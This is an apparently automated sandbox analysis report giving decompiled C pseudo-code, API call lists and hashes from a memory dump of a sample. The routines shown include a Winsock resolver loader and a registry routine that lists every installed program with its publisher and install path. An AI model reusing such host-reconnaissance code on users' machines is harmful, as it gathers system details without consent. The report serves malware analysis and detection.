                    0x0044f0f8
                    0x0044f0fa
                    0x0044f162
                    0x0044f162
                    0x0044f168
                    0x0044f16a
                    0x0044f107
                    0x0044f107
                    0x0044f107
                    0x0044f10a
                    0x0044f10b
                    0x0044f112
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044f0fa
                    0x0044f0f1
                    0x0044f0ed
                    0x0044f0df
                    0x0044f0af
                    0x0044f088
                    0x0044f088
                    0x0044f08d
                    0x0044f093
                    0x0044f115
                    0x0044f119
                    0x0044f119
                    0x0044f02d
                    0x0044f036
                    0x0044f03e
                    0x0044f042
                    0x0044f049
                    0x0044f04f
                    0x0044f051
                    0x0044f053
                    0x0044f058
                    0x0044f058
                    0x0044f05b
                    0x0044f05b
                    0x00000000
                    0x0044f051
                    0x0044f02b
                    0x0044f018
                    0x0044eff0
                    0x0044ef51
                    0x0044eeaa
                    0x0044eeaa
                    0x0044eead
                    0x0044eede
                    0x0044eede
                    0x0044eee0
                    0x0044eef0
                    0x0044eef5
                    0x0044eefa
                    0x0044ef00
                    0x0044ef03
                    0x0044ef05
                    0x00000000
                    0x0044ef07
                    0x0044ef07
                    0x0044ef0d
                    0x00000000
                    0x0044ef0f
                    0x0044ef19
                    0x0044ef1e
                    0x0044ef23
                    0x0044ef26
                    0x0044ef2c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044ef2c
                    0x0044ef0d
                    0x0044eee2
                    0x0044eee2
                    0x00000000
                    0x0044eee2
                    0x0044eeaf
                    0x0044eeaf
                    0x0044eeb5
                    0x00000000
                    0x0044eeb7
                    0x0044eeb7
                    0x0044eebc
                    0x0044eebe
                    0x0044ef2e
                    0x0044ef2e
                    0x0044ef34
                    0x0044ef34
                    0x0044ef36
                    0x0044eecb
                    0x0044eecb
                    0x0044eecb
                    0x0044eece
                    0x0044eecf
                    0x0044eed6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044eebe
                    0x0044eeb5
                    0x0044eead
                    0x0044eea4
                    0x0044ee74
                    0x0044ee4d
                    0x0044ee4d
                    0x0044ee52
                    0x0044ee58
                    0x0044eed9
                    0x0044eedd
                    0x0044eedd
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable$_wcschr
                    • String ID:
                    • API String ID: 3899193279-0
                    • Opcode ID: 4e0290ffc6fb93cd68088b26c89571a1bbd7fd833bd2f5cd262a2f3c7826dd91
                    • Instruction ID: db33de557161ca7a3fe407ad8f9b2c8ae8ed874589c98dcdacbc3812e648be3c
                    • Opcode Fuzzy Hash: 4e0290ffc6fb93cd68088b26c89571a1bbd7fd833bd2f5cd262a2f3c7826dd91
                    • Instruction Fuzzy Hash: 7AD12771900200AFFB30AFBAD881AAF7BA5AF01314F14417FF90597392EB399D498759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00414993() {
                    				char _v264;
                    				char _v532;
                    				intOrPtr _v536;
                    				CHAR* _v540;
                    				intOrPtr _v544;
                    				CHAR* _v548;
                    				intOrPtr _v552;
                    				_Unknown_base(*)()* _t42;
                    				signed int _t52;
                    				struct HINSTANCE__* _t54;
                    				struct HINSTANCE__* _t57;
                    				intOrPtr* _t63;
                    				void* _t64;
                    
                    				 *_t63 = "getaddrinfo";
                    				_v552 = E00414517;
                    				_v548 = "getnameinfo";
                    				_v544 = E004147BD;
                    				_v540 = "freeaddrinfo";
                    				_v536 = E004144DC;
                    				if( *0x475b20 == 0) {
                    					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
                    						E0044141E( &_v532, 0x10c,  &_v264);
                    						E00441478( &_v532, 0x10c, "\\ws2_32");
                    						_t64 = _t63 + 0x18;
                    						_t57 = LoadLibraryA( &_v532);
                    						_t54 = 0;
                    						if(_t57 == 0) {
                    							L6:
                    							E0044141E( &_v532, 0x10c,  &_v264);
                    							E00441478( &_v532, 0x10c, "\\wship6");
                    							_t64 = _t64 + 0x18;
                    							_t57 = LoadLibraryA( &_v532);
                    							if(_t57 != 0) {
                    								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                    									FreeLibrary(_t57);
                    									_t57 = _t54;
                    								}
                    								if(_t57 != 0) {
                    									goto L10;
                    								}
                    							}
                    						} else {
                    							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
                    								FreeLibrary(_t57);
                    								_t57 = 0;
                    							}
                    							if(_t57 != 0) {
                    								L10:
                    								_t52 = _t54;
                    								while(1) {
                    									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
                    									 *(_t64 + 0x14 + _t52 * 8) = _t42;
                    									if(_t42 == 0) {
                    										break;
                    									}
                    									_t52 = _t52 + 1;
                    									if(_t52 < 3) {
                    										continue;
                    									} else {
                    									}
                    									L15:
                    									if(_t57 != 0) {
                    										do {
                    											 *((intOrPtr*)(_t54 + 0x4709f8)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
                    											_t54 = _t54 + 8;
                    										} while (_t54 < 0x18);
                    									}
                    									goto L17;
                    								}
                    								FreeLibrary(_t57);
                    								_t57 = _t54;
                    								goto L15;
                    							} else {
                    								goto L6;
                    							}
                    						}
                    						L17:
                    					}
                    					 *0x475b20 = 1;
                    				}
                    				return  *0x4709f8;
                    			}
















                    0x004149a0
                    0x004149a7
                    0x004149af
                    0x004149b7
                    0x004149bf
                    0x004149c7
                    0x004149cf
                    0x004149ea
                    0x00414a07
                    0x00414a17
                    0x00414a1c
                    0x00414a30
                    0x00414a38
                    0x00414a3c
                    0x00414a53
                    0x00414a66
                    0x00414a76
                    0x00414a7b
                    0x00414a89
                    0x00414a8d
                    0x00414a99
                    0x00414a9c
                    0x00414a9e
                    0x00414a9e
                    0x00414aa2
                    0x00000000
                    0x00000000
                    0x00414aa2
                    0x00414a3e
                    0x00414a48
                    0x00414a4b
                    0x00414a4d
                    0x00414a4d
                    0x00414a51
                    0x00414aa4
                    0x00414aa4
                    0x00414aa6
                    0x00414aab
                    0x00414ab1
                    0x00414ab7
                    0x00000000
                    0x00000000
                    0x00414ab9
                    0x00414abd
                    0x00000000
                    0x00000000
                    0x00414abf
                    0x00414ac6
                    0x00414ac8
                    0x00414aca
                    0x00414ace
                    0x00414ad4
                    0x00414ad7
                    0x00414aca
                    0x00000000
                    0x00414ac8
                    0x00414ac2
                    0x00414ac4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414a51
                    0x00414adc
                    0x00414adf
                    0x00414ae0
                    0x00414ae0
                    0x00414af5

                    APIs
                    • GetSystemDirectoryA.KERNEL32 ref: 004149E2
                    • LoadLibraryA.KERNEL32(?), ref: 00414A24
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414A44
                    • FreeLibrary.KERNEL32(00000000), ref: 00414A4B
                    • LoadLibraryA.KERNEL32(?), ref: 00414A83
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414A95
                    • FreeLibrary.KERNEL32(00000000), ref: 00414A9C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414AAB
                    • FreeLibrary.KERNEL32(00000000), ref: 00414AC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                    • API String ID: 2490988753-744132762
                    • Opcode ID: d95a725b3e80fbcb7302b623070288155846a2c534b05ec47b6ab0d2f51101f1
                    • Instruction ID: 99e9c34d0e90789512a3dddbd2ccfa474bfbf65fc9138a34c291b4495b3012d0
                    • Opcode Fuzzy Hash: d95a725b3e80fbcb7302b623070288155846a2c534b05ec47b6ab0d2f51101f1
                    • Instruction Fuzzy Hash: 783102B19423156BC320DB64DC44EDB7BD8AFC4784F45062AF858E3211DB78D98586EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0041C124(void* __ebx, void* __ecx, void* __edx) {
                    				char _v1028;
                    				char _v1052;
                    				void* _v1056;
                    				char _v1076;
                    				void* _v1080;
                    				char _v1100;
                    				void* _v1104;
                    				char _v1124;
                    				void* _v1128;
                    				char _v1148;
                    				void* _v1152;
                    				char _v1172;
                    				void* _v1176;
                    				char _v1196;
                    				void* _v1200;
                    				char _v1220;
                    				void* _v1224;
                    				char _v1244;
                    				void* _v1248;
                    				char _v1268;
                    				void* _v1272;
                    				char _v1292;
                    				void* _v1296;
                    				char _v1316;
                    				void* _v1320;
                    				char _v1340;
                    				char _v1364;
                    				char _v1388;
                    				char _v1412;
                    				char _v1436;
                    				char _v1460;
                    				void* _v1464;
                    				char _v1484;
                    				int _v1488;
                    				void* _v1492;
                    				void* _v1496;
                    				void* __edi;
                    				void* __ebp;
                    				long _t73;
                    				long _t79;
                    				int _t86;
                    				void* _t188;
                    				int _t207;
                    				void* _t208;
                    				void* _t210;
                    				void** _t211;
                    
                    				_t188 = __edx;
                    				_t130 = __ebx;
                    				_t211 =  &_v1496;
                    				_t208 = __ecx;
                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
                    					_v1488 = 0x400;
                    					_t207 = 0;
                    					E00401F86(__ebx,  &_v1460);
                    					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
                    					_t210 = RegCloseKey;
                    					while(1) {
                    						__eflags = _t73 - 0x103;
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _t73;
                    						if(_t73 != 0) {
                    							L8:
                    							_t207 = _t207 + 1;
                    							__eflags = _t207;
                    							_v1488 = 0x400;
                    						} else {
                    							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
                    							__eflags = _t79;
                    							if(_t79 == 0) {
                    								E00413235( &_v1484, _v1496, L"DisplayName");
                    								 *_t211 = L"Publisher";
                    								E00413235( &_v1340, _v1496);
                    								 *_t211 = L"DisplayVersion";
                    								E00413235( &_v1364, _v1496);
                    								 *_t211 = L"InstallLocation";
                    								E00413235( &_v1388, _v1496);
                    								 *_t211 = L"InstallDate";
                    								E00413235( &_v1412, _v1496);
                    								 *_t211 = L"UninstallString";
                    								E00413235( &_v1436, _v1496);
                    								_t86 = E00406A4F();
                    								__eflags = _t86;
                    								if(_t86 == 0) {
                    									E0040325D(E00403014(_t130,  &_v1316, E00403014(_t130,  &_v1292, E0040431D(_t130,  &_v1268, E00403014(_t130,  &_v1244, E0040431D(_t130,  &_v1220, E00403014(_t130,  &_v1196, E0040431D(_t130,  &_v1172, E00403014(_t130,  &_v1148, E0040431D(_t130,  &_v1124, E00403014(_t130,  &_v1100, E0040431D(_t130,  &_v1076, E00409082( &_v1052,  &_v1484, _t210, "\t"), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, _t149), _t207, _t210, __eflags, "\n"));
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    									E00401F09();
                    								}
                    								RegCloseKey(_v1496);
                    								E00401F09();
                    								E00401F09();
                    								E00401F09();
                    								E00401F09();
                    								E00401F09();
                    								E00401F09();
                    								goto L8;
                    							}
                    						}
                    						__eflags = 0;
                    						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
                    					}
                    					RegCloseKey(_v1492);
                    					E00403262(_t130, _t208, _t210, __eflags,  &_v1460);
                    					E00401F09();
                    				} else {
                    					E0040417E(__ebx, _t208, _t188, 0, 0x46b928);
                    				}
                    				return _t208;
                    			}

















































                    0x0041c124
                    0x0041c124
                    0x0041c124
                    0x0041c139
                    0x0041c14e
                    0x0041c165
                    0x0041c16d
                    0x0041c16f
                    0x0041c18a
                    0x0041c190
                    0x0041c445
                    0x0041c445
                    0x0041c44a
                    0x00000000
                    0x00000000
                    0x0041c19b
                    0x0041c19d
                    0x0041c41e
                    0x0041c41e
                    0x0041c41e
                    0x0041c41f
                    0x0041c1a3
                    0x0041c1bb
                    0x0041c1c1
                    0x0041c1c3
                    0x0041c1d6
                    0x0041c1e6
                    0x0041c1ed
                    0x0041c1fd
                    0x0041c204
                    0x0041c211
                    0x0041c218
                    0x0041c225
                    0x0041c22c
                    0x0041c239
                    0x0041c240
                    0x0041c24a
                    0x0041c24f
                    0x0041c251
                    0x0041c347
                    0x0041c353
                    0x0041c35f
                    0x0041c36b
                    0x0041c377
                    0x0041c383
                    0x0041c38f
                    0x0041c39b
                    0x0041c3a7
                    0x0041c3b3
                    0x0041c3bf
                    0x0041c3cb
                    0x0041c3d7
                    0x0041c3d7
                    0x0041c3e0
                    0x0041c3e6
                    0x0041c3ef
                    0x0041c3f8
                    0x0041c404
                    0x0041c410
                    0x0041c419
                    0x00000000
                    0x0041c419
                    0x0041c1c3
                    0x0041c427
                    0x0041c43f
                    0x0041c43f
                    0x0041c454
                    0x0041c45d
                    0x0041c466
                    0x0041c150
                    0x0041c157
                    0x0041c157
                    0x0041c476

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C146
                    • RegEnumKeyExA.ADVAPI32 ref: 0041C18A
                    • RegCloseKey.ADVAPI32(?), ref: 0041C454
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 4a1b4689c5087c901415a3ab3a9855c54807dfdc543784d81ef2996b83d7e80f
                    • Instruction ID: 42425f62b602d36cbaf837c79085132ca4b8620ea7f62bc9a155105b2709b1ab
                    • Opcode Fuzzy Hash: 4a1b4689c5087c901415a3ab3a9855c54807dfdc543784d81ef2996b83d7e80f
                    • Instruction Fuzzy Hash: D48155311082419BC325EF11D851EEFB7E8FFD4309F10482FB589921A2FF74AA49CA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0041CFAD(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    				struct tagPOINT _v12;
                    				void* _t16;
                    				struct HMENU__* _t17;
                    				void* _t20;
                    				void* _t24;
                    
                    				_t16 = _a8 - 1;
                    				if(_t16 == 0) {
                    					_t17 = CreatePopupMenu();
                    					 *0x473b28 = _t17;
                    					AppendMenuA(_t17, 0, 0, "Close");
                    					L15:
                    					return 0;
                    				}
                    				_t20 = _t16 - 0x110;
                    				if(_t20 == 0) {
                    					if(_a12 != 0) {
                    						goto L15;
                    					}
                    					Shell_NotifyIconA(2, 0x473b30);
                    					ExitProcess(0);
                    				}
                    				if(_t20 == 0x2f0) {
                    					_t24 = _a16 - 0x201;
                    					if(_t24 == 0) {
                    						if(IsWindowVisible( *0x473b1c) == 0) {
                    							ShowWindow( *0x473b1c, 9);
                    							SetForegroundWindow( *0x473b1c);
                    						} else {
                    							ShowWindow( *0x473b1c, 0);
                    						}
                    						goto L15;
                    					}
                    					if(_t24 == 3) {
                    						GetCursorPos( &_v12);
                    						SetForegroundWindow(_a4);
                    						TrackPopupMenu( *0x473b28, 0, _v12, _v12.y, 0, _a4, 0);
                    						goto L15;
                    					}
                    					_push(_a16);
                    					_push(_a12);
                    					_push(0x401);
                    					L7:
                    					return DefWindowProcA(_a4, ??, ??, ??);
                    				}
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_a8);
                    				goto L7;
                    			}








                    0x0041cfb5
                    0x0041cfb8
                    0x0041d089
                    0x0041d096
                    0x0041d09e
                    0x0041d0a4
                    0x00000000
                    0x0041d0a4
                    0x0041cfbe
                    0x0041cfc3
                    0x0041d072
                    0x00000000
                    0x00000000
                    0x0041d07b
                    0x0041d083
                    0x0041d083
                    0x0041cfce
                    0x0041cfde
                    0x0041cfe3
                    0x0041d040
                    0x0041d05a
                    0x0041d066
                    0x0041d042
                    0x0041d04a
                    0x0041d04a
                    0x00000000
                    0x0041d040
                    0x0041cfe8
                    0x0041d007
                    0x0041d010
                    0x0041d02a
                    0x00000000
                    0x0041d02a
                    0x0041cfea
                    0x0041cfed
                    0x0041cff0
                    0x0041cff5
                    0x00000000
                    0x0041cff8
                    0x0041cfd0
                    0x0041cfd3
                    0x0041cfd6
                    0x00000000

                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CFF8
                    • GetCursorPos.USER32(?), ref: 0041D007
                    • SetForegroundWindow.USER32(?), ref: 0041D010
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D02A
                    • Shell_NotifyIconA.SHELL32(00000002,00473B30), ref: 0041D07B
                    • ExitProcess.KERNEL32 ref: 0041D083
                    • CreatePopupMenu.USER32 ref: 0041D089
                    • AppendMenuA.USER32 ref: 0041D09E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: 851f417ca832f1572e37d5b75acfb0a2368a393c50435e7919eb8a7e515f8ca4
                    • Instruction ID: 28d18cbeca7ffc6f23e905e7a376ca1f10be176166a978b2a9deaf94d8430eb9
                    • Opcode Fuzzy Hash: 851f417ca832f1572e37d5b75acfb0a2368a393c50435e7919eb8a7e515f8ca4
                    • Instruction Fuzzy Hash: EC212A71540205FFDB155FA4ED0DAAA3F65EB08706F004129FA09A01B2DF76D9A2EB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00445748(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				signed int _v8;
                    				char _v21;
                    				intOrPtr _v22;
                    				struct _cpinfo _v28;
                    				void* _v32;
                    				void* _v36;
                    				void* _v40;
                    				intOrPtr* _v44;
                    				signed int _v48;
                    				void* _v52;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				intOrPtr* _v64;
                    				signed int* _v68;
                    				void* _v72;
                    				char _v76;
                    				signed int _t101;
                    				signed int _t123;
                    				signed short _t126;
                    				void* _t130;
                    				void* _t134;
                    				void* _t137;
                    				void* _t138;
                    				intOrPtr _t139;
                    				void* _t141;
                    				signed int _t142;
                    				intOrPtr* _t143;
                    				signed char _t160;
                    				signed char _t165;
                    				signed int _t166;
                    				void* _t168;
                    				signed int _t170;
                    				void* _t179;
                    				signed int* _t180;
                    				signed int* _t181;
                    				signed int _t182;
                    				signed char* _t189;
                    				signed char* _t190;
                    				signed int _t192;
                    				void* _t193;
                    				intOrPtr _t197;
                    				short* _t209;
                    				intOrPtr* _t211;
                    				intOrPtr* _t215;
                    				signed int _t216;
                    				signed int _t217;
                    				void* _t218;
                    				void* _t219;
                    
                    				_t101 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t101 ^ _t217;
                    				_t211 = _a4;
                    				_t170 = 0;
                    				_v64 = _t211;
                    				_v32 = 0;
                    				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                    				_v36 = 0;
                    				_v40 = 0;
                    				_v52 = 0;
                    				_v76 = _t211;
                    				_v72 = 0;
                    				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                    					__eflags =  *(_t211 + 0x8c);
                    					if( *(_t211 + 0x8c) != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					 *(_t211 + 0x8c) = _t170;
                    					__eflags = 0;
                    					 *(_t211 + 0x90) = _t170;
                    					 *_t211 = 0x45c8b0;
                    					 *((intOrPtr*)(_t211 + 0x94)) = 0x45cb30;
                    					 *((intOrPtr*)(_t211 + 0x98)) = 0x45ccb0;
                    					 *((intOrPtr*)(_t211 + 4)) = 1;
                    					L41:
                    					return E004349BB(_v8 ^ _t217);
                    				}
                    				_t106 = _t211 + 8;
                    				_v44 = 0;
                    				if( *(_t211 + 8) != 0) {
                    					L3:
                    					_v44 = E004454E5(_t172, 1, 4);
                    					E00446172(_t170);
                    					_v32 = E004454E5(_t172, 0x180, 2);
                    					E00446172(_t170);
                    					_v36 = E004454E5(_t172, 0x180, 1);
                    					E00446172(_t170);
                    					_v40 = E004454E5(_t172, 0x180, 1);
                    					E00446172(_t170);
                    					_t197 = E004454E5(_t172, 0x101, 1);
                    					_v52 = _t197;
                    					E00446172(_t170);
                    					_t219 = _t218 + 0x3c;
                    					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                    						L36:
                    						E00446172(_v44);
                    						E00446172(_v32);
                    						E00446172(_v36);
                    						E00446172(_v40);
                    						_t170 = 1;
                    						__eflags = 1;
                    						goto L37;
                    					} else {
                    						_t123 = _t170;
                    						do {
                    							 *(_t123 + _t197) = _t123;
                    							_t123 = _t123 + 1;
                    						} while (_t123 < 0x100);
                    						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                    							goto L36;
                    						}
                    						_t126 = _v28;
                    						_t235 = _t126 - 5;
                    						if(_t126 > 5) {
                    							goto L36;
                    						}
                    						_t28 = _t197 + 1; // 0x1
                    						_v48 = _t126 & 0x0000ffff;
                    						_t192 = 0xff;
                    						_t130 = E0044A875(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						_t236 = _t130;
                    						if(_t130 == 0) {
                    							goto L36;
                    						}
                    						_t34 = _t197 + 1; // 0x1
                    						_t134 = E0044A875(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                    						_t219 = _t219 + 0x24;
                    						if(_t134 == 0) {
                    							goto L36;
                    						}
                    						if(_v48 <= 1 || _v22 == _t170) {
                    							L22:
                    							_v60 = _v32 + 0x100;
                    							_t137 = E00450B3C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                    							_t219 = _t219 + 0x1c;
                    							if(_t137 == 0) {
                    								goto L36;
                    							}
                    							_t193 = _v32;
                    							_t138 = _t193 + 0xfe;
                    							 *_t138 = 0;
                    							_t179 = _v36;
                    							_v32 = _t138;
                    							_t139 = _v40;
                    							 *(_t179 + 0x7f) = _t170;
                    							_t180 = _t179 - 0xffffff80;
                    							 *(_t139 + 0x7f) = _t170;
                    							_v68 = _t180;
                    							 *_t180 = _t170;
                    							_t181 = _t139 + 0x80;
                    							_v56 = _t181;
                    							 *_t181 = _t170;
                    							if(_v48 <= 1 || _v22 == _t170) {
                    								L32:
                    								_t182 = 0x3f;
                    								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								asm("movsb");
                    								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                    								asm("movsw");
                    								asm("movsb");
                    								_t215 = _v64;
                    								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                    									asm("lock xadd [ecx], eax");
                    									if((_t142 | 0xffffffff) == 0) {
                    										E00446172( *(_t215 + 0x90) - 0xfe);
                    										E00446172( *(_t215 + 0x94) - 0x80);
                    										E00446172( *(_t215 + 0x98) - 0x80);
                    										E00446172( *((intOrPtr*)(_t215 + 0x8c)));
                    									}
                    								}
                    								_t143 = _v44;
                    								 *_t143 = 1;
                    								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                    								 *_t215 = _v60;
                    								 *(_t215 + 0x90) = _v32;
                    								 *(_t215 + 0x94) = _v68;
                    								 *(_t215 + 0x98) = _v56;
                    								 *(_t215 + 4) = _v48;
                    								L37:
                    								E00446172(_v52);
                    								goto L41;
                    							} else {
                    								_t189 =  &_v21;
                    								while(1) {
                    									_t160 =  *_t189;
                    									if(_t160 == 0) {
                    										break;
                    									}
                    									_t216 =  *(_t189 - 1) & 0x000000ff;
                    									if(_t216 > (_t160 & 0x000000ff)) {
                    										L30:
                    										_t189 =  &(_t189[2]);
                    										if( *(_t189 - 1) != _t170) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t209 = _t193 + 0x100 + _t216 * 2;
                    									do {
                    										_t216 = _t216 + 1;
                    										 *_t209 = 0x8000;
                    										_t209 = _t209 + 2;
                    									} while (_t216 <= ( *_t189 & 0x000000ff));
                    									goto L30;
                    								}
                    								goto L32;
                    							}
                    						} else {
                    							_t190 =  &_v21;
                    							while(1) {
                    								_t165 =  *_t190;
                    								if(_t165 == 0) {
                    									goto L22;
                    								}
                    								_t192 =  *(_t190 - 1) & 0x000000ff;
                    								_t166 = _t165 & 0x000000ff;
                    								while(_t192 <= _t166) {
                    									 *((char*)(_t192 + _t197)) = 0x20;
                    									_t192 = _t192 + 1;
                    									__eflags = _t192;
                    									_t166 =  *_t190 & 0x000000ff;
                    								}
                    								_t190 =  &(_t190[2]);
                    								_t242 =  *(_t190 - 1) - _t170;
                    								if( *(_t190 - 1) != _t170) {
                    									continue;
                    								}
                    								goto L22;
                    							}
                    							goto L22;
                    						}
                    					}
                    				}
                    				_t168 = E00452884(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                    				_t219 = _t218 + 0x14;
                    				if(_t168 != 0) {
                    					goto L36;
                    				}
                    				goto L3;
                    			}



















































                    0x00445750
                    0x00445757
                    0x0044575c
                    0x0044575f
                    0x00445762
                    0x00445765
                    0x00445768
                    0x0044576e
                    0x00445771
                    0x00445774
                    0x00445777
                    0x0044577a
                    0x0044577f
                    0x00445a9f
                    0x00445aa1
                    0x00445aa3
                    0x00445aa3
                    0x00445aa6
                    0x00445aac
                    0x00445aae
                    0x00445ab4
                    0x00445aba
                    0x00445ac4
                    0x00445ace
                    0x00445ad5
                    0x00445ae5
                    0x00445ae5
                    0x00445785
                    0x00445788
                    0x0044578d
                    0x004457ab
                    0x004457b5
                    0x004457b8
                    0x004457cb
                    0x004457ce
                    0x004457dc
                    0x004457df
                    0x004457ed
                    0x004457f0
                    0x00445801
                    0x00445804
                    0x00445807
                    0x0044580c
                    0x00445812
                    0x00445a66
                    0x00445a69
                    0x00445a71
                    0x00445a79
                    0x00445a81
                    0x00445a8b
                    0x00445a8b
                    0x00000000
                    0x0044583b
                    0x0044583b
                    0x0044583d
                    0x0044583d
                    0x00445840
                    0x00445841
                    0x00445857
                    0x00000000
                    0x00000000
                    0x0044585d
                    0x00445860
                    0x00445863
                    0x00000000
                    0x00000000
                    0x00445870
                    0x00445873
                    0x00445876
                    0x00445893
                    0x00445898
                    0x0044589b
                    0x0044589d
                    0x00000000
                    0x00000000
                    0x004458b7
                    0x004458c7
                    0x004458cc
                    0x004458d1
                    0x00000000
                    0x00000000
                    0x004458db
                    0x00445908
                    0x0044591e
                    0x00445921
                    0x00445926
                    0x0044592b
                    0x00000000
                    0x00000000
                    0x00445931
                    0x00445936
                    0x0044593c
                    0x0044593f
                    0x00445942
                    0x00445945
                    0x00445948
                    0x0044594b
                    0x00445952
                    0x00445955
                    0x00445958
                    0x0044595a
                    0x00445960
                    0x00445963
                    0x00445965
                    0x004459a7
                    0x004459a9
                    0x004459b2
                    0x004459b7
                    0x004459ba
                    0x004459c4
